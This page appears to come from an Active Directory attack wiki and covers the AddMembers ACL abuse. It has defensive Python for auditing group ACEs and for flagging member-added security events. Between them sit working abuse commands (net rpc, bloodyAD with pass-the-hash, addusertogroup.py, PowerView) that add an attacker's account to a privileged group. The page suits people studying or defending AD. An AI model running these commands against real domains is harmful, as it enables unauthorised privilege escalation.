AddMembers
When an attacker controls a privileged user account with the ability to edit a group's member attribute, they can add new users to that group. This attack is possible when the controlled account has GenericAll, GenericWrite, Self, AllExtendedRights, or Self-Membership (WriteProperty or Self scoped to the member attribute) over the target group.
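From the defender's side, the first question is which principals actually hold one of those rights over sensitive groups. The following Python is an added example and not part of the original page: it evaluates ACE records against the rights listed above and reports trustees outside an expected admin set. The ACE field names, the sample entries and the expected-admin set are assumptions constructed for the example; the member attribute GUID is the documented AD schema value.

```python
# Added example: audit ACEs on a group for rights that allow editing its
# member attribute. Field names and sample data are constructed assumptions.
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set, Tuple

# Schema GUID of the AD "member" attribute. A WriteProperty or Self
# (validated write) ACE scoped to this GUID is the Self-Membership/AddMember right.
MEMBER_ATTRIBUTE_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"

# Rights that permit member editing regardless of the ACE's object type.
BROAD_RIGHTS = {"GenericAll", "GenericWrite", "AllExtendedRights"}
# Rights that permit it only when unscoped or scoped to the member attribute.
SCOPED_RIGHTS = {"WriteProperty", "Self"}


@dataclass(frozen=True)
class Ace:
    group: str                        # group object the ACE is set on
    principal: str                    # trustee holding the right
    rights: frozenset                 # e.g. frozenset({"GenericAll"})
    object_type: Optional[str] = None # attribute GUID the ACE is scoped to
    ace_type: str = "Allow"           # "Allow" or "Deny"


def ace_allows_add_member(ace: Ace) -> Optional[str]:
    """Return the right that lets the trustee add members, or None."""
    if ace.ace_type != "Allow":
        return None
    broad = ace.rights & BROAD_RIGHTS
    if broad:
        return sorted(broad)[0]
    scoped = ace.rights & SCOPED_RIGHTS
    # Unscoped WriteProperty/Self covers every attribute, including member.
    if scoped and ace.object_type in (None, MEMBER_ATTRIBUTE_GUID):
        return sorted(scoped)[0]
    return None


def find_add_member_risks(aces: Iterable[Ace],
                          expected_admins: Set[str]) -> List[Tuple[str, str, str]]:
    """(group, principal, right) for every trustee outside the expected set."""
    findings = []
    for ace in aces:
        right = ace_allows_add_member(ace)
        if right and ace.principal not in expected_admins:
            findings.append((ace.group, ace.principal, right))
    return findings


# Constructed sample ACL for a sensitive group (assumption, not real data).
SAMPLE_ACES = [
    Ace("Vulnerable Group", "DOMAIN\\Domain Admins", frozenset({"GenericAll"})),
    Ace("Vulnerable Group", "DOMAIN\\otter", frozenset({"WriteProperty"}),
        object_type=MEMBER_ATTRIBUTE_GUID),                      # Self-Membership
    Ace("Vulnerable Group", "DOMAIN\\helpdesk", frozenset({"Self"}),
        object_type=MEMBER_ATTRIBUTE_GUID),                      # validated write
    Ace("Vulnerable Group", "DOMAIN\\auditors", frozenset({"WriteProperty"}),
        object_type="00000000-0000-0000-0000-000000000001"),    # unrelated attribute
    Ace("Vulnerable Group", "DOMAIN\\svc_backup", frozenset({"GenericWrite"}),
        ace_type="Deny"),                                        # deny ACE, not a risk
]

if __name__ == "__main__":
    for group, who, right in find_add_member_risks(SAMPLE_ACES, {"DOMAIN\\Domain Admins"}):
        print(f"{who} can add members to '{group}' via {right}")
```

Feed it the ACEs of your Tier 0 groups and treat every finding as a path to group membership that should be removed or explicitly accepted.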
Once we have found a user or group holding one of these ACEs over the target group, we can abuse it with the following commands:
net rpc group addmem 'Vulnerable Group' otter -U domain.com/otter%'SomethingSecure123!' -S 10.10.10.10
# verify the changes took place
net rpc group members 'Vulnerable Group' -U domain.com/otter%'SomethingSecure123!' -S 10.10.10.10
If we only have the user's NT hash, we can use either pth-toolkit or bloodyAD:
bloodyAD --host "10.10.10.10" -d "domain.com" -u "otter" -p "ffffffffffffffffffffffffffffffff:<NTLM_HASH>" add groupMember 'Vulnerable Group' otter
We can also use the addusertogroup.py script:
python3 addusertogroup.py -d domain.com -g "Vulnerable Group" -a otter -u otter -p 'SomethingSecure123!'
From Windows we can use PowerView's Add-DomainGroupMember:
Add-DomainGroupMember -Identity "Vulnerable Group" -Members otter -Verbose
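Every one of the commands above ends in a membership write that the domain controller logs as Security event 4728, 4732 or 4756 (member added to a security-enabled global, local or universal group). The Python below is an added example, not part of the original page: it runs over constructed event records shaped like those events' fields (SubjectUserName, MemberName, TargetUserName) and flags additions to watched groups by unexpected subjects, plus the Self-Membership pattern where the acting account adds itself. The watchlists and sample events are assumptions.

```python
# Added example: flag suspicious group-membership additions from Windows
# Security events 4728/4732/4756. Records and watchlists are constructed assumptions.
from typing import Dict, List, Optional

MEMBER_ADDED_EVENTS = {4728, 4732, 4756}  # global / local / universal group

# Assumed watchlists; adapt to the groups and admin accounts in your tiering model.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Vulnerable Group"}
EXPECTED_SUBJECTS = {"admin.alice"}


def cn_of(dn: str) -> Optional[str]:
    """First RDN value of a DN: 'otter' from 'CN=otter,CN=Users,DC=domain,DC=com'."""
    first = dn.split(",", 1)[0]
    if "=" not in first:
        return None
    return first.split("=", 1)[1]


def flag_member_additions(events: List[Dict]) -> List[Dict]:
    """Return one finding per member-added event that trips a rule."""
    findings = []
    for ev in events:
        if ev.get("EventID") not in MEMBER_ADDED_EVENTS:
            continue
        group = ev["TargetUserName"]      # group that was modified
        subject = ev["SubjectUserName"]   # account that performed the write
        member = ev["MemberName"]         # DN of the account that was added
        reasons = []
        if group in PRIVILEGED_GROUPS and subject not in EXPECTED_SUBJECTS:
            reasons.append("unexpected subject changed privileged group")
        # Self-Membership heuristic: compares the added member's CN with the
        # subject's sAMAccountName; these coincide in many domains but not
        # all, so this is an assumption for the example.
        added_cn = cn_of(member)
        if added_cn and added_cn.lower() == subject.lower():
            reasons.append("subject added own account")
        if reasons:
            findings.append({"event": ev["EventID"], "group": group,
                             "subject": subject, "member": member,
                             "reasons": reasons})
    return findings


# Constructed sample events (assumption, not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4728, "SubjectUserName": "admin.alice",
     "MemberName": "CN=bob,CN=Users,DC=domain,DC=com", "TargetUserName": "Domain Admins"},
    {"EventID": 4728, "SubjectUserName": "otter",
     "MemberName": "CN=otter,CN=Users,DC=domain,DC=com", "TargetUserName": "Vulnerable Group"},
    {"EventID": 4756, "SubjectUserName": "helpdesk",
     "MemberName": "CN=carol,CN=Users,DC=domain,DC=com", "TargetUserName": "VPN Users"},
    {"EventID": 4729, "SubjectUserName": "otter",   # member removed: out of scope
     "MemberName": "CN=otter,CN=Users,DC=domain,DC=com", "TargetUserName": "Vulnerable Group"},
]

if __name__ == "__main__":
    for f in flag_member_additions(SAMPLE_EVENTS):
        print(f"{f['event']} {f['subject']} -> {f['group']}: {', '.join(f['reasons'])}")
```

The second sample record is exactly what the net rpc / bloodyAD / PowerView commands above produce when otter adds otter to the group, which is why "subject added own account" is worth its own rule rather than relying on the group watchlist alone.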